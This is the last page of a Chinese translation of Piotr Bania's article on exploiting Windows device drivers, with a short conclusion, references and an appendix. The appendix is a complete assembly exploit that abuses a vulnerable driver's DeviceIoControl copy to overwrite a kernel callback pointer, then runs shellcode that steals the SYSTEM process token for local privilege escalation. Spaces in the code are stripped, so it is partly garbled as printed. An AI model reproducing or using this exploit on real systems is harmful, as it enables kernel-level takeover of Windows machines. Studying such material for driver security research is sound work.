WEB开发网
开发学院网络安全安全技术 详解如何利用Windows设备驱动 阅读

详解如何利用Windows设备驱动

 2009-02-12 13:55:33 来源:WEB开发网   
核心提示: 结束语最后希望你能够喜欢这个文档,如果你有什么疑问不能解决,详解如何利用Windows设备驱动(10),请联系我,所有文章中设计的程序可以在网站http://pb.specialised.info 上下载

结束语

最后希望你能够喜欢这个文档,如果你有什么疑问不能解决,请联系我。所有文章中设计的程序可以在网站http://pb.specialised.info 上下载。

参考文献:

1) Win32 Device Drivers Communication Vulnerabilities

2) "Remote Windows Kernel Exploitation – Step into the Ring 0", by Barnaby Jack –

eEYE digital security – http://www.eeye.com

3) Eyas shellcode publication - ?

4) "The Windows 2000/NT Native Api Reference", by Gary Nebett

5) "Windows Syscall Shellcode", by myself -http://www.securityfocus.net/infocus/1844

6) http://pb.specialised.info

附录:exploit

   ;------------------------------------------------------------
  ;Samplelocaldevicedriverexploit
  ;byPiotrBania 
  ;http://pb.specialised.info
  ;Allrightsreserved
  ;------------------------------------------------------------
  includemy_macro.inc
  DEVICE_NAMEequ".BUGGY"
  MY_ADDRESSequ000110000h
  MY_ADDRESS_SIZEequ512h;somemore
  D_PACKETstruct
  dp_destdd0
  dp_srcdd0
  D_PACKETends
  callfind_KeUserModeCallback_Routine
  callget_ntos_base
  moveax,dwordptr[real_ntos_base]
  adddwordptr[KeUserModeCallback_Routine],eax
  callopen_device
  movebx,eax
  pushPAGE_EXECUTE_READWRITE
  pushMEM_COMMIT
  pushMY_ADDRESS_SIZE
  pushMY_ADDRESS
  @callxVirtualAlloc
  @check0,"Error:cannotallocatememory!"
  movedi,eax
  ;firstsignalcopiesoriginalbytestothebuffer
  moveax,dwordptr[KeUserModeCallback_Routine]
  movdwordptr[routine_addr],eax
  mov[edi.D_PACKET.dp_src],eax
  mov[edi.D_PACKET.dp_dest],edi
  add[edi.D_PACKET.dp_dest],8
  movecx,512
  calltalk2device
  ;originalbytesarestoredatedi+8(insizeof512)
  ;nowletsfilltheshellcode
  moveax,[edi+8]
  movdwordptr[old_routine],eax
  movdwordptr[old_routine2],eax
  @callxGetCurrentProcessId
  movdwordptr[my_pid],eax
  pushedi
  movecx,my_shellcode_size
  addedi,512+8
  leaesi,my_shellcode
  repmovsb
  popedi
  ;maketheoldKeUserModeCallback_Routinepointtoourshellcode
  ;andexchangethesourcepacketwithdestinationpacket
  mov[edi+8],edi
  add[edi+8],512+8
  moveax,[edi.D_PACKET.dp_src]
  movedx,[edi.D_PACKET.dp_dest]
  mov[edi.D_PACKET.dp_src],edx
  mov[edi.D_PACKET.dp_dest],eax
  movecx,MY_ADDRESS_SIZE
  calltalk2device
  pushMEM_DECOMMIT
  pushMY_ADDRESS_SIZE
  pushedi
  @callxVirtualFree
  @debug"I'mescalated!!!",MB_ICONINFORMATION
  exit:
  push0
  @callxExitProcess
  ;------------------------------------------------------------
  ;DeviceDrivershellcode
  ;------------------------------------------------------------
  XP_PID_OFFSETequ084h
  XP_FLINK_OFFSETequ088h
  XP_TOKEN_OFFSETequ0C8h
  XP_SYS_PIDequ04h
  my_shellcodeproc
  pushad
  db0b8h;moveax,old_routine
  old_routinedd0;hardcoded
  db0b9h;movecx,routine_addr
  routine_addrdd0;thistoo
  mov[ecx],eax;restoreoldroutine
  ;avoidmultiplecalls...
  ;-----------------------------------------
  ;startescalationprocedure
  ;-----------------------------------------
  moveax,dwordptrfs:[124h]
  moveax,[eax+44h]
  pusheax;EAX=EPROCESS
  s1:moveax,[eax+XP_FLINK_OFFSET];EAX=
  EPROCESS.ActiveProcessLinks.Flink
  subeax,XP_FLINK_OFFSET;EAX=EPROCESSofnextprocess
  cmp[eax+XP_PID_OFFSET],XP_SYS_PID;UniqueProcessId==SYSTEMPID?
  jnes1;nope,continuesearch
  ;EAX=foundEPROCESS
  movedi,[eax+XP_TOKEN_OFFSET];ptrtoEPROCESS.token
  andedi,0fffffff8h;alignedby8
  popeax;EAX=EPROCESS
  db68h;hardcodedpush
  my_piddd0
  popebx;EBX=pidtoescalate
  s2:
  moveax,[eax+XP_FLINK_OFFSET];EAX=EPROCESS.ActiveProcessLinks.Flink
  subeax,XP_FLINK_OFFSET;EAX=EPROCESSofnextprocess
  cmp[eax+XP_PID_OFFSET],ebx;isitourPID???
  jnes2;nope,trynextone
  mov[eax+XP_TOKEN_OFFSET],edi;party'sover:)
  popad
  db68h;pushold_routine
  old_routine2dd0;ret
  ret
  tok_handledd0
  my_shellcode_sizeequ$-offsetmy_shellcode
  my_shellcodeendp
  ;------------------------------------------------------------
  ;findstheKeUserModeCallback_Routinefromntoskrnl.exe
  ;------------------------------------------------------------
  find_KeUserModeCallback_Routineproc
  pushad
  push1;DONT_RESOLVE_DLL_REFERENCES
  push0
  @pushsz"C:windowssystem32ntoskrnl.exe"
  @callxLoadLibraryExA
  @check0,"Error:cannotloadlibrary"
  movebx,eax
  @pushsz"KeUserModeCallback"
  pusheax
  @callxGetProcAddress
  movedi,eax
  @check0,"Error:cannotobtainKeUserModeCallbackaddress"
  scan_for_call:incedi
  cmpwordptr[edi],015FFh
  jnescan_for_call
  moveax,[edi+2]
  movecx,[ebx+3ch]
  addecx,ebx
  movecx,[ecx+34h]
  subeax,ecx
  movdwordptr[KeUserModeCallback_Routine],eax
  popad
  ret
  find_KeUserModeCallback_Routineendp
  ;------------------------------------------------------------
  ;Getsntoskrnl.exemodulebase(real)
  ;------------------------------------------------------------
  get_ntos_baseproc
  local__MODULES:_MODULES
  pushad
  @get_api_addr"ntdll","NtQuerySystemInformation"
  @check0,"Error:cannotgrabNtQuerySystemInformationaddress"
  movebx,eax
  calla1
  nsdd0
  a1:push4
  leaecx,[__MODULES]
  pushecx
  pushSystemModuleInformation
  calleax
  cmpeax,0c0000004h
  jneerror_ntos
  pushdwordptr[ns]
  pushGMEM_FIXEDorGMEM_ZEROINIT
  @callxGlobalAlloc
  movebp,eax
  push0
  pushdwordptr[ns]
  pushebp
  pushSystemModuleInformation
  callebx
  testeax,eax
  jnzerror_ntos
  moveax,dwordptr[ebp.smi_Base]
  movdwordptr[real_ntos_base],eax
  pushebp
  @callxGlobalFree
  popad
  ret
  error_ntos:xoreax,eax
  @check0,"Error:cannotexecuteNtQuerySystemInformation"
  get_ntos_baseendp
  ;------------------------------------------------------------
  ;Opensthedevicewearetryingtoattack
  ;------------------------------------------------------------
  open_deviceproc
  pushad
  push0
  push80h
  push3
  push0
  push0
  push0
  @pushszDEVICE_NAME
  @callxCreateFileA
  @check-1,"Error:cannotopendevice!"
  movdwordptr[esp+PUSHA_STRUCT._EAX],eax
  popad
  ret
  open_deviceendp
  ;------------------------------------------------------------
  ;Procedurethatcommunicateswiththedriver
  ;
  ;ENTRY->EDI=INPUTBUFFER
  ;ECX=INPUTBUFFERSIZE
  ;EBX=DEVICEHANDLE
  ;------------------------------------------------------------
  talk2deviceproc
  pushad
  push0
  pushoffsetbytes_ret
  push0
  push0
  pushecx
  pushedi
  push011111111h
  pushebx
  @callxDeviceIoControl
  @check0,"Error:Send()failed"
  popad
  ret
  bytes_retdd0
  talk2deviceendp
  _MODULESstruct
  dwNModulesdd0
  smi_Reserveddd2dup(0)
  smi_Basedd0
  smi_Sizedd0
  smi_Flagsdd0
  smi_Indexdw0
  smi_Unknowndw0
  smi_LoadCountdw0
  smi_ModuleNamedw0
  smi_ImageNamedb256dup(0)
  ends
  SystemModuleInformationequ11
  KeUserModeCallback_Routinedd0
  real_ntos_basedd0
  basedd0
  includedebug.inc
  endstart

原文作者:Piotr Bania

译者BLOG:http://hi.baidu.com/ayarei

上一页  5 6 7 8 9 10 

Tags:详解 如何 利用

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接